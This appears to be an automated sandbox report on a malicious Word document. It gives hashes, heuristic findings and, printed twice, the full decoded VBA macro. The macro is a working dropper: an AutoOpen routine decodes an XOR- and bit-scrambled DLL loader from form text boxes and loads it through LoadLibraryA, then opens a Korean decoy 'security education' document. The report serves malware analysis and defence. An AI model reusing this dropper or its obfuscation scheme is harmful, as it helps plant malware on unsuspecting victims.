Office (OLE) / .DOC malware analysis — malicious · dad2f5351e4bd310

MALICIOUS

Office (OLE) / .DOC

214.0 KB Created: 2025-11-21 03:19:00 Authoring application: Microsoft Office Word First seen: 2026-06-20

MD5: 60e25e54566af7a3ae37ce2e071e529c SHA-1: 63f2992202730aeb595b45cc37cc4f4764bf2024 SHA-256: dad2f5351e4bd3101963ee0ec751296614a0548a2ea13f8f005d1a9e4c90586c

130 Risk Score

Heuristics 6

Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set objDocApp = CreateObject("Word.Application")
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6635 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6635 bytes
SHA-256: `e878e03dbd01ef5d7a359601be4c22b86d492b8dbdf5f77e56c20433354bd507`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare PtrSafe Function fhemfkdlqmfjfl Lib "kernel32" Alias "LoadLibraryA" (ByVal tmxmfld As String) As LongPtr Private Declare PtrSafe Function vmflrieoqjdksl Lib "kernel32" (ByVal hLibModule As LongPtr) As Long Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) Function DecToBin(ByVal decimalValue As Long) As String Dim binaryStr As String binaryStr = "" Do While decimalValue > 0 binaryStr = (decimalValue Mod 2) & binaryStr decimalValue = decimalValue \ 2 Loop If binaryStr = "" Then binaryStr = "0" DecToBin = Right("00000000" & binaryStr, 8) End Function Function HexToBinary(hexValue As String) As String Dim decimalValue As Long decimalValue = CLng("&H" & hexValue) HexToBinary = DecToBin(decimalValue) End Function Function BinaryToByte(binStr As String) As Byte Dim result As Byte, k As Integer result = 0 For k = 1 To 8 result = result * 2 + Mid(binStr, k, 1) Next k BinaryToByte = result End Function Function ExtractOrgDoc(docpath) Dim OrgData, nDocSize, lenbinarray Dim binaryArray() As String Dim newbinaryarray() As String Dim inx As Long Dim objStream As Object Dim currentIndex As Long Dim byteBin As String OrgData = UserForm1.TextBox1.Text nDocSize = Len(OrgData) / 2 ReDim binaryArray(nDocSize * 8 - 1) ReDim newbinaryarray(nDocSize * 8 - 1) currentIndex = 0 For inx = 0 To nDocSize - 1 tempbyte = CByte("&H" + Mid(OrgData, inx * 2 + 1, 2)) tempbyte = tempbyte Xor 27 byteBin = DecToBin(tempbyte) For j = 1 To Len(byteBin) binaryArray(currentIndex) = Mid(byteBin, j, 1) currentIndex = currentIndex + 1 Next j Next inx lenbinarray = nDocSize * 8 For inx = 0 To nDocSize * 8 - 4 Step 4 temp1 = binaryArray(inx) temp2 = binaryArray(inx + 1) binaryArray(inx) = binaryArray(inx + 2) binaryArray(inx + 1) = binaryArray(inx + 3) binaryArray(inx + 2) = temp1 binaryArray(inx + 3) = temp2 Next inx For i = 0 To lenbinarray - 1 newbinaryarray(i) = binaryArray(lenbinarray - 1 - i) If newbinaryarray(i) = "1" Then newbinaryarray(i) = "0" Else newbinaryarray(i) = "1" End If Next i Dim fileNum As Integer Dim byteArray() As Byte Dim bitString As String fileNum = FreeFile Open docpath For Binary As #fileNum ReDim byteArray((lenbinarray \ 8) - 1) For i = 0 To lenbinarray - 1 Step 8 bitString = "" For j = 0 To 7 bitString = bitString & newbinaryarray(i + j) Next j byteArray(i \ 8) = BinaryToByte(bitString) 'Debug.Print byteArray(1) 'Debug.Print byteArray(2) Next i Put #fileNum, , byteArray Close #fileNum End Function Function ExtractLoader(loaderpath) Dim LoaderData, nLoaderSize, lenbinarray Dim binaryArray() As String Dim newbinaryarray() As String Dim inx As Long Dim objStream As Object Dim currentIndex As Long Dim byteBin As String LoaderData = UserForm1.TextBox2.Text nLoaderSize = Len(LoaderData) / 2 ReDim binaryArray(nLoaderSize * 8 - 1) ReDim newbinaryarray(nLoaderSize * 8 - 1) currentIndex = 0 For inx = 0 To nLoaderSize - 1 tempbyte = CByte("&H" + Mid(LoaderData, inx * 2 + 1, 2)) tempbyte = tempbyte Xor 27 byteBin = DecToBin(tempbyte) For j = 1 To Len(byteBin) binaryArray(currentIndex) = Mid(byteBin, j, 1) currentIndex = currentIndex + 1 Next j Next inx lenbinarray = nLoaderSize * 8 For inx = 0 To nLoaderSize * 8 - 4 Step 4 temp1 = binaryArray(inx) temp2 = binaryArray(inx + 1) binaryArray(inx) = binaryArray(inx + 2) binaryArray(inx + 1) = binaryArray(inx + 3) binaryArray(inx + 2) = temp1 binaryArray(inx + 3) = temp2 Next inx For i = 0 To lenbinarray - 1 newbinaryarray(i) = binaryArray(lenbinarray - 1 - i) If newbinaryarray(i) = "1" Then newbinaryarray(i) = "0" Else newbinaryarray(i) = "1" End If Next i Dim fileNum As Integer Dim byteArray() As Byte Dim bitString As String fileNum = FreeFile Open loaderpath For Binary As #fileNum ReDim byteArray((lenbinarray \ 8) - 1) For i = 0 To lenbinarray - 1 Step 8 bitString = "" For j = 0 To 7 bitString = bitString & newbinaryarray(i + j) Next j byteArray(i \ 8) = BinaryToByte(bitString) Next i Put #fileNum, , byteArray Close #fileNum End Function Sub AutoOpen() Dim folderpath, loaderpath On Error Resume Next folderpath = "C:\ProgramData\HLSOffice" orgfolderpath = "C:\ProgramData\Document" MkDir (folderpath) MkDir (orgfolderpath) orgdocpath = folderpath & "\" & "2026년_1차_보안교육_프로그램_안내.docx" orgnewpath = orgfolderpath & "\" & "2026년_1차_보안교육_프로그램_안내.docx" ExtractOrgDoc (orgnewpath) loaderpath = folderpath & "\hlsoffice_aam.dll" ExtractLoader (loaderpath) Dim h As LongPtr h = fhemfkdlqmfjfl(loaderpath) Sleep 20000 vmflrieoqjdksl h h = fhemfkdlqmfjfl(loaderpath) Sleep 5000 vmflrieoqjdksl h Dim objDocApp Set objDocApp = CreateObject("Word.Application") objDocApp.Visible = True objDocApp.Documents.Open orgnewpath Application.Quit (wdDoNotSaveChanges) End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{40DBFA34-49DC-47A0-B728-3DB5DE2DDA5C}{B2643123-6853-43D0-8A55-2FDAD717650D}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox1_Change() End Sub Private Sub TextBox2_Change() End Sub Private Sub UserForm_Click() End Sub

SHA-256: e878e03dbd01ef5d7a359601be4c22b86d492b8dbdf5f77e56c20433354bd507

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function fhemfkdlqmfjfl Lib "kernel32" Alias "LoadLibraryA" (ByVal tmxmfld As String) As LongPtr
Private Declare PtrSafe Function vmflrieoqjdksl Lib "kernel32" (ByVal hLibModule As LongPtr) As Long
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)

Function DecToBin(ByVal decimalValue As Long) As String
    Dim binaryStr As String
    binaryStr = ""

    Do While decimalValue > 0
        binaryStr = (decimalValue Mod 2) & binaryStr
        decimalValue = decimalValue \ 2
    Loop

    If binaryStr = "" Then binaryStr = "0"
    DecToBin = Right("00000000" & binaryStr, 8)
End Function
Function HexToBinary(hexValue As String) As String
    Dim decimalValue As Long
    decimalValue = CLng("&H" & hexValue)
    HexToBinary = DecToBin(decimalValue)
End Function
Function BinaryToByte(binStr As String) As Byte
    Dim result As Byte, k As Integer
    result = 0
    For k = 1 To 8
        result = result * 2 + Mid(binStr, k, 1)
    Next k
    BinaryToByte = result
End Function

Function ExtractOrgDoc(docpath)
    Dim OrgData, nDocSize, lenbinarray
    Dim binaryArray() As String
    Dim newbinaryarray() As String
    Dim inx As Long
    Dim objStream As Object
    Dim currentIndex As Long
    Dim byteBin As String

    OrgData = UserForm1.TextBox1.Text
    nDocSize = Len(OrgData) / 2
    
    ReDim binaryArray(nDocSize * 8 - 1)
    ReDim newbinaryarray(nDocSize * 8 - 1)
    
    currentIndex = 0

    For inx = 0 To nDocSize - 1
        tempbyte = CByte("&H" + Mid(OrgData, inx * 2 + 1, 2))
        tempbyte = tempbyte Xor 27
        byteBin = DecToBin(tempbyte)
        
        For j = 1 To Len(byteBin)
            binaryArray(currentIndex) = Mid(byteBin, j, 1)
            currentIndex = currentIndex + 1
        Next j
    Next inx

    lenbinarray = nDocSize * 8
    For inx = 0 To nDocSize * 8 - 4 Step 4
        temp1 = binaryArray(inx)
        temp2 = binaryArray(inx + 1)
        binaryArray(inx) = binaryArray(inx + 2)
        binaryArray(inx + 1) = binaryArray(inx + 3)
        binaryArray(inx + 2) = temp1
        binaryArray(inx + 3) = temp2
    Next inx
    
    For i = 0 To lenbinarray - 1
        newbinaryarray(i) = binaryArray(lenbinarray - 1 - i)
        If newbinaryarray(i) = "1" Then
            newbinaryarray(i) = "0"
        Else
            newbinaryarray(i) = "1"
        End If
    Next i

   
    Dim fileNum As Integer
    Dim byteArray() As Byte
    Dim bitString As String
    
    fileNum = FreeFile
    Open docpath For Binary As #fileNum
    
    ReDim byteArray((lenbinarray \ 8) - 1)
    For i = 0 To lenbinarray - 1 Step 8
        bitString = ""
        For j = 0 To 7
            bitString = bitString & newbinaryarray(i + j)
        Next j
        byteArray(i \ 8) = BinaryToByte(bitString)
        'Debug.Print byteArray(1)
        'Debug.Print byteArray(2)
    Next i
    
    Put #fileNum, , byteArray
    Close #fileNum
End Function

Function ExtractLoader(loaderpath)
    Dim LoaderData, nLoaderSize, lenbinarray
    Dim binaryArray() As String
    Dim newbinaryarray() As String
    Dim inx As Long
    Dim objStream As Object
    Dim currentIndex As Long
    Dim byteBin As String

    LoaderData = UserForm1.TextBox2.Text
    nLoaderSize = Len(LoaderData) / 2

    ReDim binaryArray(nLoaderSize * 8 - 1)
    ReDim newbinaryarray(nLoaderSize * 8 - 1)

    currentIndex = 0

    For inx = 0 To nLoaderSize - 1
        tempbyte = CByte("&H" + Mid(LoaderData, inx * 2 + 1, 2))
        tempbyte = tempbyte Xor 27
        byteBin = DecToBin(tempbyte)
        
        For j = 1 To Len(byteBin)
            binaryArray(currentIndex) = Mid(byteBin, j, 1)
            currentIndex = currentIndex + 1
        Next j
    Next inx

    lenbinarray = nLoaderSize * 8
    For inx = 0 To nLoaderSize * 8 - 4 Step 4
        temp1 = binaryArray(inx)
        temp2 = binaryArray(inx + 1)
        binaryArray(inx) = binaryArray(inx + 2)
        binaryArray(inx + 1) = binaryArray(inx + 3)
        binaryArray(inx + 2) = temp1
        binaryArray(inx + 3) = temp2
    Next inx

    For i = 0 To lenbinarray - 1
        newbinaryarray(i) = binaryArray(lenbinarray - 1 - i)
        If newbinaryarray(i) = "1" Then
            newbinaryarray(i) = "0"
        Else
            newbinaryarray(i) = "1"
        End If
    Next i

    Dim fileNum As Integer
    Dim byteArray() As Byte
    Dim bitString As String

    fileNum = FreeFile
    Open loaderpath For Binary As #fileNum

    ReDim byteArray((lenbinarray \ 8) - 1)
    For i = 0 To lenbinarray - 1 Step 8
        bitString = ""
        For j = 0 To 7
            bitString = bitString & newbinaryarray(i + j)
        Next j
        byteArray(i \ 8) = BinaryToByte(bitString)
    Next i

    Put #fileNum, , byteArray
    Close #fileNum
End Function

Sub AutoOpen()
    Dim folderpath, loaderpath
On Error Resume Next
    
    folderpath = "C:\ProgramData\HLSOffice"
    orgfolderpath = "C:\ProgramData\Document"
    MkDir (folderpath)
    MkDir (orgfolderpath)

    orgdocpath = folderpath & "\" & "2026년_1차_보안교육_프로그램_안내.docx"
    orgnewpath = orgfolderpath & "\" & "2026년_1차_보안교육_프로그램_안내.docx"
    ExtractOrgDoc (orgnewpath)

    loaderpath = folderpath & "\hlsoffice_aam.dll"
    ExtractLoader (loaderpath)

    Dim h As LongPtr
    h = fhemfkdlqmfjfl(loaderpath)
    Sleep 20000
    vmflrieoqjdksl h
    h = fhemfkdlqmfjfl(loaderpath)
    Sleep 5000
    vmflrieoqjdksl h

    Dim objDocApp
    Set objDocApp = CreateObject("Word.Application")
    objDocApp.Visible = True
    objDocApp.Documents.Open orgnewpath

    Application.Quit (wdDoNotSaveChanges)
    
End Sub




Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{40DBFA34-49DC-47A0-B728-3DB5DE2DDA5C}{B2643123-6853-43D0-8A55-2FDAD717650D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Private Sub TextBox2_Change()

End Sub

Private Sub UserForm_Click()

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.